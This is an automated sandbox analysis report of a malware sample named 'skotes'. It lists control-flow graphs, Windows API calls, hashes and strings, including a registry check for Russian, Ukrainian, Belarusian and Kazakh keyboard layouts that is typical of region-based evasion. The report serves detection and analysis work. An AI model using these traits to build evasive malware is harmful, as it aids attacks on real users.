                                                        control_flow_graph 1716 fa5ee0-fa5fde 1722 fa6008-fa6015 call fbcff1 1716->1722 1723 fa5fe0-fa5fec 1716->1723 1725 fa5ffe-fa6005 call fbd663 1723->1725 1726 fa5fee-fa5ffc 1723->1726 1725->1722 1726->1725 1728 fa6016-fa619d call fd6c6a call fbe150 call fb80c0 * 5 RegOpenKeyExA 1726->1728 1745 fa61a3-fa6233 call fd40f0 1728->1745 1746 fa64b1-fa64ba 1728->1746 1772 fa6239-fa623d 1745->1772 1773 fa649f-fa64ab 1745->1773 1748 fa64bc-fa64c7 1746->1748 1749 fa64e7-fa64f0 1746->1749 1753 fa64c9-fa64d7 1748->1753 1754 fa64dd-fa64e4 call fbd663 1748->1754 1750 fa651d-fa6526 1749->1750 1751 fa64f2-fa64fd 1749->1751 1757 fa6528-fa6533 1750->1757 1758 fa6553-fa655c 1750->1758 1755 fa64ff-fa650d 1751->1755 1756 fa6513-fa651a call fbd663 1751->1756 1753->1754 1759 fa65d7-fa65df call fd6c6a 1753->1759 1754->1749 1755->1756 1755->1759 1756->1750 1763 fa6549-fa6550 call fbd663 1757->1763 1764 fa6535-fa6543 1757->1764 1766 fa655e-fa6569 1758->1766 1767 fa6585-fa658e 1758->1767 1763->1758 1764->1759 1764->1763 1776 fa657b-fa6582 call fbd663 1766->1776 1777 fa656b-fa6579 1766->1777 1769 fa65bb-fa65d6 call fbcff1 1767->1769 1770 fa6590-fa659f 1767->1770 1779 fa65b1-fa65b8 call fbd663 1770->1779 1780 fa65a1-fa65af 1770->1780 1782 fa6499 1772->1782 1783 fa6243-fa6279 RegEnumValueA 1772->1783 1773->1746 1776->1767 1777->1759 1777->1776 1779->1769 1780->1759 1780->1779 1782->1773 1789 fa627f-fa629e 1783->1789 1790 fa6486-fa648d 1783->1790 1793 fa62a0-fa62a5 1789->1793 1790->1783 1791 fa6493 1790->1791 1791->1782 1793->1793 1794 fa62a7-fa62fb call fb80c0 call fb7a00 * 2 call fa5d50 1793->1794 1794->1790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                        • API String ID: 0-3963862150
                                                        • Opcode ID: 81a266f568c966457c657463704aa5db3eaa165ae683946e04e6d06c0848ac5f
                                                        • Instruction ID: 2dac67315b2315b620a8d8449c02a3d15414a92fbbee08c5f0c153dd6c6ddf68
                                                        • Opcode Fuzzy Hash: 81a266f568c966457c657463704aa5db3eaa165ae683946e04e6d06c0848ac5f
                                                        • Instruction Fuzzy Hash: 6DD1BFB19002589FEB24DF24CC88BDEB7B9EF05340F5442D8E508E7291DB749AA4DF95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1802 fa7d30-fa7db2 call fd40f0 1806 fa7db8-fa7de0 call fb7a00 call fa5c10 1802->1806 1807 fa8356-fa8373 call fbcff1 1802->1807 1814 fa7de2 1806->1814 1815 fa7de4-fa7e06 call fb7a00 call fa5c10 1806->1815 1814->1815 1820 fa7e0a-fa7e23 1815->1820 1821 fa7e08 1815->1821 1824 fa7e54-fa7e7f 1820->1824 1825 fa7e25-fa7e34 1820->1825 1821->1820 1828 fa7eb0-fa7ed1 1824->1828 1829 fa7e81-fa7e90 1824->1829 1826 fa7e4a-fa7e51 call fbd663 1825->1826 1827 fa7e36-fa7e44 1825->1827 1826->1824 1827->1826 1830 fa8374 call fd6c6a 1827->1830 1834 fa7ed3-fa7ed5 GetNativeSystemInfo 1828->1834 1835 fa7ed7-fa7edc 1828->1835 1832 fa7e92-fa7ea0 1829->1832 1833 fa7ea6-fa7ead call fbd663 1829->1833 1843 fa8379-fa837f call fd6c6a 1830->1843 1832->1830 1832->1833 1833->1828 1839 fa7edd-fa7ee6 1834->1839 1835->1839 1841 fa7ee8-fa7eef 1839->1841 1842 fa7f04-fa7f07 1839->1842 1845 fa8351 1841->1845 1846 fa7ef5-fa7eff 1841->1846 1847 fa7f0d-fa7f16 1842->1847 1848 fa82f7-fa82fa 1842->1848 1845->1807 1850 fa834c 1846->1850 1851 fa7f18-fa7f24 1847->1851 1852 fa7f29-fa7f2c 1847->1852 1848->1845 1853 fa82fc-fa8305 1848->1853 1850->1845 1851->1850 1855 fa7f32-fa7f39 1852->1855 1856 fa82d4-fa82d6 1852->1856 1857 fa832c-fa832f 1853->1857 1858 fa8307-fa830b 1853->1858 1861 fa8019-fa82bd call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fa5d50 call fb7a00 call fa5c10 call fa5730 call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fa5d50 call fb7a00 call fa5c10 call fa5730 call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fa5d50 call fb7a00 call fa5c10 call fa5730 call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fa5d50 call fb7a00 call fa5c10 call fa5730 1855->1861 1862 fa7f3f-fa7f9b call fb7a00 call fa5c10 call fb7a00 call fa5c10 call fa5d50 1855->1862 1859 fa82d8-fa82e2 1856->1859 1860 fa82e4-fa82e7 1856->1860 1865 fa833d-fa8349 1857->1865 1866 fa8331-fa833b 1857->1866 1863 fa830d-fa8312 1858->1863 1864 fa8320-fa832a 1858->1864 1859->1850 1860->1845 1868 fa82e9-fa82f5 1860->1868 1902 fa82c3-fa82cc 1861->1902 1887 fa7fa0-fa7fa7 1862->1887 1863->1864 1870 fa8314-fa831e 1863->1870 1864->1845 1865->1850 1866->1845 1868->1850 1870->1845 1889 fa7fab-fa7fcb call fd8bbe 1887->1889 1890 fa7fa9 1887->1890 1896 fa7fcd-fa7fdc 1889->1896 1897 fa8002-fa8004 1889->1897 1890->1889 1899 fa7fde-fa7fec 1896->1899 1900 fa7ff2-fa7fff call fbd663 1896->1900 1901 fa800a-fa8014 1897->1901 1897->1902 1899->1843 1899->1900 1900->1897 1901->1902 1902->1848 1905 fa82ce 1902->1905 1905->1856
                                                        APIs
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00FA7ED3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoNativeSystem
                                                        • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                        • API String ID: 1721193555-3123340372
                                                        • Opcode ID: a925351faa62e3cdacf187696c9a6460cff747bec065012d808549665b7bc235
                                                        • Instruction ID: 0b8f7af501f6b6f628231e0705b1cd21d16f967566ea0a1407648a3148973aa4
                                                        • Opcode Fuzzy Hash: a925351faa62e3cdacf187696c9a6460cff747bec065012d808549665b7bc235
                                                        • Instruction Fuzzy Hash: E4E13AB1E003449BDF25BB28CC5B79D7B71AB42720F94428CE4556B3C2DB795E81ABC2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2077 fdb655-fdb665 DeleteFileW 2078 fdb679-fdb67c 2077->2078 2079 fdb667-fdb678 call fd75c0 2077->2079
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,00FD6A97,?), ref: 00FDB65D
                                                        • __dosmaperr.LIBCMT ref: 00FDB66E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile__dosmaperr
                                                        • String ID:
                                                        • API String ID: 1911827773-0
                                                        • Opcode ID: 478f6e7f56c7cf27d62cc337d0f5828f62b8e16cc8480296716db84005f9adbe
                                                        • Instruction ID: 6db64b465b2bd5554ef8b7f5ddbc0780f902e4e693376de32eea2e480565b923
                                                        • Opcode Fuzzy Hash: 478f6e7f56c7cf27d62cc337d0f5828f62b8e16cc8480296716db84005f9adbe
                                                        • Instruction Fuzzy Hash: 35D0123218A209B69E2035B56C0851A3B8E9BC13743692A52B86C856E1EF26C8506055

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2141 fa8380-fa8401 call fd40f0 2145 fa840d-fa8435 call fb7a00 call fa5c10 2141->2145 2146 fa8403-fa8408 2141->2146 2154 fa8439-fa845b call fb7a00 call fa5c10 2145->2154 2155 fa8437 2145->2155 2147 fa854f-fa856b call fbcff1 2146->2147 2160 fa845f-fa8478 2154->2160 2161 fa845d 2154->2161 2155->2154 2164 fa847a-fa8489 2160->2164 2165 fa84a9-fa84d4 2160->2165 2161->2160 2166 fa848b-fa8499 2164->2166 2167 fa849f-fa84a6 call fbd663 2164->2167 2168 fa8501-fa8522 2165->2168 2169 fa84d6-fa84e5 2165->2169 2166->2167 2172 fa856c-fa8571 call fd6c6a 2166->2172 2167->2165 2170 fa8528-fa852d 2168->2170 2171 fa8524-fa8526 GetNativeSystemInfo 2168->2171 2174 fa84f7-fa84fe call fbd663 2169->2174 2175 fa84e7-fa84f5 2169->2175 2178 fa852e-fa8535 2170->2178 2171->2178 2174->2168 2175->2172 2175->2174 2178->2147 2183 fa8537-fa853f 2178->2183 2184 fa8548-fa854b 2183->2184 2185 fa8541-fa8546 2183->2185 2184->2147 2186 fa854d 2184->2186 2185->2147 2186->2147
                                                        APIs
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00FA8524
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoNativeSystem
                                                        • String ID:
                                                        • API String ID: 1721193555-0
                                                        • Opcode ID: 7fffb8bb29dbe506258ed737bb222510e41d6dbea4e76451e73b40b3e9005a75
                                                        • Instruction ID: a9ab4c8fdba60b15e52a69595092326f6f2b65cd932aa8aec04a33a1b8b0da3a
                                                        • Opcode Fuzzy Hash: 7fffb8bb29dbe506258ed737bb222510e41d6dbea4e76451e73b40b3e9005a75
                                                        • Instruction Fuzzy Hash: B65159B0D002589FDB24EB78CD497DDB775EB46320F5442A9E818A72C1EF749E809F91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2187 fdb04b-fdb057 2188 fdb089-fdb094 call fd75f6 2187->2188 2189 fdb059-fdb05b 2187->2189 2197 fdb096-fdb098 2188->2197 2190 fdb05d-fdb05e 2189->2190 2191 fdb074-fdb085 RtlAllocateHeap 2189->2191 2190->2191 2193 fdb087 2191->2193 2194 fdb060-fdb067 call fd9dc0 2191->2194 2193->2197 2194->2188 2199 fdb069-fdb072 call fd8e36 2194->2199 2199->2188 2199->2191
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,362816CD,?,?,00FBD3FC,362816CD,?,00FB7A8B,?,?,?,?,?,?,00FA7465,?), ref: 00FDB07E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5034f993e8134e811c071cb11b75745c7325b66d31562255628f31f172b8a2e0
                                                        • Instruction ID: 74772b65e1870dcdb9cf86791699b60056d5224430b4d7374ae5172835b8ee6f
                                                        • Opcode Fuzzy Hash: 5034f993e8134e811c071cb11b75745c7325b66d31562255628f31f172b8a2e0
                                                        • Instruction Fuzzy Hash: 3AE0E535501212D6DA313B654C08B5FBA4B8B423B0F0F0213ED6496380EB14CC00B2E0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79e2f31a49739f92d2bb56e2626e1814a51ea447ee24995ed7a6e58109aab799
                                                        • Instruction ID: 2b0b5c72a16911672a5422669e2c6930c0cc47d9152f771efd0f1ea9aa99eddf
                                                        • Opcode Fuzzy Hash: 79e2f31a49739f92d2bb56e2626e1814a51ea447ee24995ed7a6e58109aab799
                                                        • Instruction Fuzzy Hash: DC0162AB00821DED8A42D1A8764CAF6ABEFFA407303305D22F886868E1C110570A8EA1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 87cb4c87da937f30fd0b3eea3df761e6e3710d9f3b3f52fa2eb2fc3d319267b1
                                                        • Instruction ID: 70c2f7dd00ccf445575aab0a23b1580fa2c2fc9724133c95c834d9eefb5ecd95
                                                        • Opcode Fuzzy Hash: 87cb4c87da937f30fd0b3eea3df761e6e3710d9f3b3f52fa2eb2fc3d319267b1
                                                        • Instruction Fuzzy Hash: 42F04EAB048218DA864395BC694D5FD7BD7BA412317244E52FC42965D2C15623468DA2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 622892b2de078c48ac98a61df15de5eaacf19a091ea32749d47f600278d7b937
                                                        • Instruction ID: 182adbbe0ac5ce469f91c1af8bfe2d7a7be71bb5414ee786ccae9ba289c0fb03
                                                        • Opcode Fuzzy Hash: 622892b2de078c48ac98a61df15de5eaacf19a091ea32749d47f600278d7b937
                                                        • Instruction Fuzzy Hash: B7F04CBF00C31DDEC282E298B64D6B6BBDBB7013307304E12F843965E2C15413458ED1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 480ff79b4eb4c662b2a4ea1310963d44096bc7e75dba6731559bd109d198d60f
                                                        • Instruction ID: 3725f492fad74b7b4be163fcdc5bce59eba6bae0eed2e4fc2181593f8ece0820
                                                        • Opcode Fuzzy Hash: 480ff79b4eb4c662b2a4ea1310963d44096bc7e75dba6731559bd109d198d60f
                                                        • Instruction Fuzzy Hash: 25F0F6AF00C22DEA8182D6AABA4D6F6BBDBB6013717244D12F84796AE2C15513458DE2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfdad370d2562fb0288fa382870d21e9d8a939ffccc8de85ac4e62d2849a576e
                                                        • Instruction ID: 6d59182188744fd55007f3e1aa15ea1196cce9740d64e57b1dc3a3200fd73021
                                                        • Opcode Fuzzy Hash: bfdad370d2562fb0288fa382870d21e9d8a939ffccc8de85ac4e62d2849a576e
                                                        • Instruction Fuzzy Hash: D3F02E79048359CFC2D1E6FD650C6FAB7E77B12731B104D16E442864D2C29533059D91
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1bc4a0384eaeaff8bfe87a57ccb9e2bad0b1267cb309763b66f76c11112b51b8
                                                        • Instruction ID: 1246e103b1dd9968d069967a28ff364ee183f672041286c8000f331b40bd3b5d
                                                        • Opcode Fuzzy Hash: 1bc4a0384eaeaff8bfe87a57ccb9e2bad0b1267cb309763b66f76c11112b51b8
                                                        • Instruction Fuzzy Hash: 13F05CAD04C359CAC282E2BD694C7F9BBD7BB01332B240D26E483875E2C254630A8D92
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8e78aa5c95801eff15289820846febb58bd5daed85818ac4f658a659f136879
                                                        • Instruction ID: 05ed100c74962cb21420f41abeffdedf33fc1224281b82cf3ce01f40c0300179
                                                        • Opcode Fuzzy Hash: f8e78aa5c95801eff15289820846febb58bd5daed85818ac4f658a659f136879
                                                        • Instruction Fuzzy Hash: 0DE026BD008759CA8181E2B8A80C7BABBE63B40712B200E25A882874E2C2646300D9A2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2898484788.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_5570000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da94931a31ae9f82c69aff7be24b85b7d7ee57087ec2c335a419dac89b82dc81
                                                        • Instruction ID: a50a9770776988da2b8a3f80367f9bb10ae35c8a27d447a1ab744a4109d1ee13
                                                        • Opcode Fuzzy Hash: da94931a31ae9f82c69aff7be24b85b7d7ee57087ec2c335a419dac89b82dc81
                                                        • Instruction Fuzzy Hash: 65E02699008B9A94C642E768984CABABBE27B51759B084F164481838D2C2A973048AA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 137152a00336bb65b1cffeec41ce1aac0dc03f1cfe6f97a5ccca0c410a331df3
                                                        • Instruction ID: 78922a2eb09ec5884bbd373b5ff3f04a2fd6c94c6be791e69d61b5fc5c2c4e00
                                                        • Opcode Fuzzy Hash: 137152a00336bb65b1cffeec41ce1aac0dc03f1cfe6f97a5ccca0c410a331df3
                                                        • Instruction Fuzzy Hash: C8C25D72E042688FCF25CE29DD487E9B3B5EB84314F1541EAD94DE7240E779AE81AF40
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2895241974.0000000000FA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FA0000, based on PE: true
                                                        • Associated: 00000006.00000002.2895209071.0000000000FA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895241974.0000000001002000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895341143.0000000001009000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000100B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000126B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.000000000129C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895371803.00000000012B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895781747.00000000012B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895962301.000000000144C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 00000006.00000002.2895991964.000000000144E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_fa0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                        • Instruction ID: e0f5530857ad26b90a3ffc99b3ab56df7a88a183daf60acff0e8849706d928cf
